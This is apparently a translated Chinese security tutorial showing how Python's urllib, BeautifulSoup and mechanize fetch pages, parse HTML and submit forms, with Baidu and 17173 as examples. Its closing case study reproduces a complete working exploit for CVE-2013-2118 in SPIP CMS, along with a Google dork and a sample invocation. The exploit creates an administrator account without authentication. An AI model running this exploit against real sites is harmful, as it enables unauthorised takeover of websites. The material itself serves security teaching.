
            Original article: http://drops.wooyun.org/tips/2591

            0x00 Overview


            Working from example code, this article explains the role Python can play in web security analysis, using the most basic examples to show the reader how Python fetches, parses, and processes various kinds of web pages. System environment: kali + BeautifulSoup + mechanize. Since nothing here touches low-level driver design, the example code runs on any platform; whichever platform you choose, just make sure the required packages are installed first.

            0x01 Fetching web pages with Python


            #!bash
            Python 2.7.6 (default, Nov 10 2013, 19:24:24) [MSC v.1500 64 bit (AMD64)] on win32
            Type "copyright", "credits" or "license()" for more information.
            >>> import urllib
            

            First import urllib so we can carry on with the analysis below.

            #!python
            >>> httpResponse = urllib.urlopen("http://www.baidu.com")
            

            Fetch an HTTP response, using Baidu as the example.

            #!python
            >>> httpResponse.code
            200
            

            The status is 200 OK.
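
            The accessor method getcode() returns the same status value as the code attribute, if you prefer a method call:

            #!python
            >>> httpResponse.getcode()
            200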

            #!python
            >>> print httpResponse.read()[0:500]
            

            For brevity, only the first 500 characters are shown here.

            <!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" /><link rel="dns-prefetch" href="http://t12.baidu.co
            

            Take a look at the structure of the HTTP response object.

            #!python
            >>> dir(httpResponse)
            ['__doc__', '__init__', '__iter__', '__module__', '__repr__', 'close', 'code', 'fileno', 'fp', 'getcode', 'geturl', 'headers', 'info', 'next', 'read', 'readline', 'readlines', 'url']
            

            Check which URL the response corresponds to.

            #!python
            >>> httpResponse.url
            'http://www.baidu.com'
            

            In the same way, inspect the internals of the headers structure.

            #!python
            >>> dir(httpResponse.headers)
            ['__contains__', '__delitem__', '__doc__', '__getitem__', '__init__', '__iter__', '__len__', '__module__', '__setitem__', '__str__', 'addcontinue', 'addheader', 'dict', 'encodingheader', 'fp', 'get', 'getaddr', 'getaddrlist', 'getallmatchingheaders', 'getdate', 'getdate_tz', 'getencoding', 'getfirstmatchingheader', 'getheader', 'getheaders', 'getmaintype', 'getparam', 'getparamnames', 'getplist', 'getrawheader', 'getsubtype', 'gettype', 'has_key', 'headers', 'iscomment', 'isheader', 'islast', 'items', 'keys', 'maintype', 'parseplist', 'parsetype', 'plist', 'plisttext', 'readheaders', 'rewindbody', 'seekable', 'setdefault', 'startofbody', 'startofheaders', 'status', 'subtype', 'type', 'typeheader', 'unixfrom', 'values']
            >>> httpResponse.headers.items()
            [('bdqid', '0xeb89374a00028e2e'), ('x-powered-by', 'HPHP'), ('set-cookie', 'BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com'), ('expires', 'Tue, 15 Jul 2014 02:37:00 GMT'), ('vary', 'Accept-Encoding'), ('bduserid', '0'), ('server', 'BWS/1.1'), ('connection', 'Close'), ('cxy_all', 'baidu+776b3a548a71afebd09c6640f9af5559'), ('cache-control', 'private'), ('date', 'Tue, 15 Jul 2014 02:37:47 GMT'), ('p3p', 'CP=" OTI DSP COR IVA OUR IND COM "'), ('content-type', 'text/html; charset=utf-8'), ('bdpagetype', '1')]
            

            Try a simple bit of parsing on them.

            #!python
            >>> for header, value in httpResponse.headers.items():
                print header + ':' + value
            
            bdqid:0xeb89374a00028e2e
            x-powered-by:HPHP
            set-cookie:BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com
            expires:Tue, 15 Jul 2014 02:37:00 GMT
            vary:Accept-Encoding
            bduserid:0
            server:BWS/1.1
            connection:Close
            cxy_all:baidu+776b3a548a71afebd09c6640f9af5559
            cache-control:private
            date:Tue, 15 Jul 2014 02:37:47 GMT
            p3p:CP=" OTI DSP COR IVA OUR IND COM "
            content-type:text/html; charset=utf-8
            bdpagetype:1
            
            >>> url = 'http://www.baidu.com/s?wd=df&rsv_spt=1'
            

            The complete URL used to fetch the page.
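
            As an aside, the standard library's urlparse module shows how such a URL decomposes into exactly the pieces we are about to assemble by hand:

            #!python
            >>> import urlparse
            >>> urlparse.urlparse(url)
            ParseResult(scheme='http', netloc='www.baidu.com', path='/s', params='', query='wd=df&rsv_spt=1', fragment='')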

            #!python
            >>> base_url = 'http://www.baidu.com'
            

            The base URL.

            #!python
            >>> args = {'wd':'df','rsv_spt':1}
            

            Build the query parameters separately.

            #!python
            >>> encode_args = urllib.urlencode(args)
            

            urlencode encodes the parameter dict into URL query-string form.
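
            Printing the encoded string shows the familiar query-string form (the key order may differ on your machine, since Python 2 dicts are unordered):

            #!python
            >>> encode_args
            'rsv_spt=1&wd=df'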

            #!python
            >>> fp2=urllib.urlopen(base_url+'/s?'+encode_args)
            

            Try fetching the web page again, assembled this way.

            #!python
            >>> print fp2.read()[0:500].decode("utf-8")
            

            Since the page is UTF-8 encoded, you have to set the decoding for the Chinese text yourself.

            <!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>df_百度搜索</title><style data-for="result" >body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing
            >>>
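
            Rather than hard-coding the charset, it can also be read from the Content-Type header: headers is a mimetools.Message, and its getparam() parses header parameters. A small sketch, using a fresh handle (fp3 below) because fp2 has already been read:

            #!python
            >>> fp3 = urllib.urlopen(base_url+'/s?'+encode_args)
            >>> fp3.headers.getparam('charset')
            'utf-8'
            >>> page = fp3.read().decode(fp3.headers.getparam('charset'))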
            

            0x02 Parsing HTML pages with Python


            First install BeautifulSoup from http://www.crummy.com/software/BeautifulSoup/
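
            If pip is available, the same install is a one-liner; otherwise run setup.py from the unpacked source, as shown below:

            #!bash
            pip install beautifulsoup4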

            #!bash
            root@kali:~/Desktop/beautifulsoup4-4.3.2# python setup.py install
            running install
            running build
            running build_py
            creating build/lib.linux-x86_64-2.7
            creating build/lib.linux-x86_64-2.7/bs4
            copying bs4/dammit.py -> build/lib.linux-x86_64-2.7/bs4
            copying bs4/testing.py -> build/lib.linux-x86_64-2.7/bs4
            copying bs4/element.py -> build/lib.linux-x86_64-2.7/bs4
            copying bs4/__init__.py -> build/lib.linux-x86_64-2.7/bs4
            …………………………………………………………(some lines omitted)
            copying bs4/diagnose.py -> build/lib.linux-x86_64-2.7/bs4
            creating build/lib.linux-x86_64-2.7/bs4/builder
            copying bs4/builder/_lxml.py -> build/lib.linux-x86_64-2.7/bs4/builder
            copying bs4/builder/_htmlparser.py -> build/lib.linux-x86_64-2.7/bs4/builder
            root@kali:~/Desktop/beautifulsoup4-4.3.2#
            

            Now bs4 is ready to use.

            #!bash
            root@kali:~# python
            Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
            [GCC 4.7.2] on linux2
            Type "help", "copyright", "credits" or "license" for more information.
            >>> from bs4 import BeautifulSoup
            

            Import the bs4 package (installed above).

            #!python
            >>> import urllib
            >>> html = urllib.urlopen('http://www.baidu.com')
            >>> html.code
            200
            >>> bt = BeautifulSoup(html.read(),"lxml")
            

            bs4 here parses with lxml, which kali appears to ship by default; on Windows installing it yourself is rather more of a hassle.
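
            If lxml is missing, bs4 can fall back on the parser from the standard library instead; it is slower and less forgiving, but needs no extra install. A sketch (html2 is a fresh handle, since the earlier one has already been consumed):

            #!python
            >>> html2 = urllib.urlopen('http://www.baidu.com')
            >>> bt = BeautifulSoup(html2.read(), "html.parser")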

            #!python
            >>> bt.title
            

            The title tag.

            #!python
            <title>百度一下,你就知道</title>
            >>> bt.title.string
            u'\u767e\u5ea6\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053'
            >>> bt.meta
            <meta content="text/html;charset=utf-8" http-equiv="content-type"/>
            >>> bt.meta.next
            <meta content="IE=Edge" http-equiv="X-UA-Compatible"/>
            >>> bt.meta.next.next
            <link  rel="dns-prefetch"/>
            >>> allMetaTags = bt.find_all('meta')
            

            Find all the meta tags.

            #!python
            >>> allMetaTags
            [<meta content="text/html;charset=utf-8" http-equiv="content-type"/>, <meta content="IE=Edge" http-equiv="X-UA-Compatible"/>, <meta content="0; url=/baidu.html?from=noscript" http-equiv="refresh"/>]
            >>> allMetaTags[0]
            <meta content="text/html;charset=utf-8" http-equiv="content-type"/>
            
            >>> allLinks = bt.find_all('a')
            

            Find all the a tags (links).

            #!python
            >>> allLinks[0]
            <a  onmousedown="return user_c({'fm':'set','tab':'setting','login':'0'})">搜索設置</a>
            >>> allLinks[1]
            <a href="/" id="btop" onmousedown="return user_c({'fm':'set','tab':'index','login':'0'})">百度首頁</a>
            
            >>> for link in allLinks:
            ...     print link['href']
            ... 
            

            Try a simple extraction pass over them.

            http://www.baidu.com/gaoji/preferences.html
            https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
            https://passport.baidu.com/v2/?reg&regType=1&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
            http://news.baidu.com/ns?cl=2&rn=20&tn=news&word=
            http://tieba.baidu.com/f?kw=&fr=wwwt
            http://zhidao.baidu.com/q?ct=17&pn=0&tn=ikaslist&rn=10&word=&fr=wwwt
            http://music.baidu.com/search?fr=ps&key=
            http://image.baidu.com/i?tn=baiduimage&ps=1&ct=201326592&lm=-1&cl=2&nc=1&word=
            http://v.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=
            http://map.baidu.com/m?word=&fr=ps01000
            http://wenku.baidu.com/search?word=&lm=0&od=0
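
            When a page contains anchors without an href attribute, link['href'] raises a KeyError; Tag.get() returns None instead, which makes the loop safer on sloppy markup:

            #!python
            >>> for link in allLinks:
            ...     href = link.get('href')
            ...     if href:
            ...         print href
            ... 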
            

            0x03 Handling forms with Python + mechanize


            #!bash
            root@kali:~# python
            Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
            [GCC 4.7.2] on linux2
            Type "help", "copyright", "credits" or "license" for more information.
            >>> import mechanize
            

            Import mechanize.

            #!python
            >>> br = mechanize.Browser()
            

            Construct a browser instance.
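
            Two optional settings are worth knowing about before opening pages: mechanize honors robots.txt by default (raising an error where fetching is disallowed), and some sites serve different content to unknown user agents. Both can be adjusted; a sketch with a placeholder User-Agent string:

            #!python
            >>> br.set_handle_robots(False)
            >>> br.addheaders = [('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64)')]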

            #!python
            >>> br.open('http://www.17173.com')
            

            Open a page that contains forms.

            #!python
            <response_seek_wrapper at 0x248db90 whose wrapped object = <closeable_response at 0x248d098 whose fp = <socket._fileobject object at 0x1f868d0>>>
            
            >>> for form in br.forms():
            ...     print form
            ... 
            
            <GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
              <HiddenControl(charset=gbk) (readonly)>
              <TextControl(keyword=????????)>
              <SubmitControl(<None>=????) (readonly)>>
            <searchask GET http://search.17173.com/jsp/game.jsp application/x-www-form-urlencoded
              <HiddenControl(charset=gbk) (readonly)>
              <TextControl(<None>=)>
              <TextControl(<None>=)>>
            <voteform POST http://vote.17173.com/action/vote_process.php application/x-www-form-urlencoded
              <HiddenControl(vote_id=9624) (readonly)>
              <HiddenControl(vote_year=) (readonly)>
              <CheckboxControl(vote_item_9624[]=[49649, 49650, 49651, 49652, 49653, 49654, 49655, 49656])>
              <SubmitControl(<None>=) (readonly)>>
            <GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
              <HiddenControl(charset=gbk) (readonly)>
              <TextControl(keyword=????????)>
              <SubmitControl(<None>=????) (readonly)>>
            >>> 
            
            >>> br.select_form(nr=0)
            

            Select the form to work with.

            #!python
            >>> br.form['keyword']='2013'
            

            Set the value of a form field (here a TextControl).

            #!python
            >>> br.submit()
            

            Submit the form the way a browser would.

            #!python
            <response_seek_wrapper at 0x248dab8 whose wrapped object = <closeable_response at 0x249d950 whose fp = <socket._fileobject object at 0x243e5d0>>>
            >>> br
            <mechanize._mechanize.Browser instance at 0x242ff38>
            >>>
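
            submit() returns a response object just like urlopen() does, and the same response can be fetched again later through br.response(); a quick sketch:

            #!python
            >>> result = br.response()
            >>> print result.geturl()        # URL of the results page we landed on
            >>> print result.read()[0:200]   # first 200 bytes of the results HTML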
            

            0x04 Case study


            Below is an exploit for a CMS flaw that lets an unauthenticated user trigger an administrator password recovery; the original author's information is preserved in full.

            #!python
            #!/usr/bin/env python
            # Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
            # Date: 04/30/2014
            # Flaw finder : Unknown
            # Exploit Author: Gregory DRAPERI
            # Email: gregory |dot| draperi |at| gmail |dot| com
            # Google Dork : inurl="spip.php"
            # Vendor Homepage: www.spip.net
            # Software Link: http://files.spip.org/spip/archives/
            # Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
            # Tested on: Windows 7 - SPIP 2.2.21
            # CVE : CVE-2013-2118
            '''
            ---------------------------------------------------------------------------------------------------------
            Software Description:
            SPIP is a free software content management system
            ---------------------------------------------------------------------------------------------------------
            Vulnerability Details:
            This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
            To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
            
            '''
            import urllib, urllib2
            import cookielib
            import sys
            import re
            
            def send_request(urlOpener, url, post_data=None):
               # Send a request to the URL (a POST if post_data is supplied)
               request = urllib2.Request(url)
               # Let urllib2 handle the HTTP exchange through the opener
               url = urlOpener.open(request, post_data)
               return url.read()
            
            if len(sys.argv) < 4:
               # Print a simple usage message and quit
               print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
               exit()
            
            base_url = sys.argv[1]   # base URL of the target site
            login = sys.argv[2]      # login name to register
            mail = sys.argv[3]       # mailbox that will receive the recovered credentials
            
            cookiejar = cookielib.CookieJar()
            # Handle cookies so the forged session persists across requests
            urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
            
            
            formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
            print "[+] First request sended..."
            # Send the first HTTP request
            
            
            # Locate the target form in the response
            m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)

            # Pull the hidden token out of its value attribute
            m = re.search("(?<=value=')[\w\+/=]*", m.group(0))
            
            
            formulaire_data = {'var_ajax' : 'form',
                               'page' : 'identifiants',
                               'mode' : '0minirezo',
                               'formulaire_action' : 'inscription',
                               'formulaire_action_args' : m.group(0),
                               'nom_inscription' : login,
                               'mail_inscription' : mail,
                               'nobot' : ''
                              }
            # Build the request parameters
            formulaire_data = urllib.urlencode(formulaire_data)
            # URL-encode them
            
            
            send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
            print "[+] Second request sended"
            
            
            print "[+] You should receive an email with credentials soon :) "
            # Once the second request has been sent, the attack is complete
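
            A hypothetical invocation against a test install (the target URL, login, and mailbox below are placeholders):

            #!bash
            root@kali:~# python script.py http://target.example/spip newadmin attacker@example.com
            [+] First request sended...
            [+] Second request sended
            [+] You should receive an email with credentials soon :) 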
            
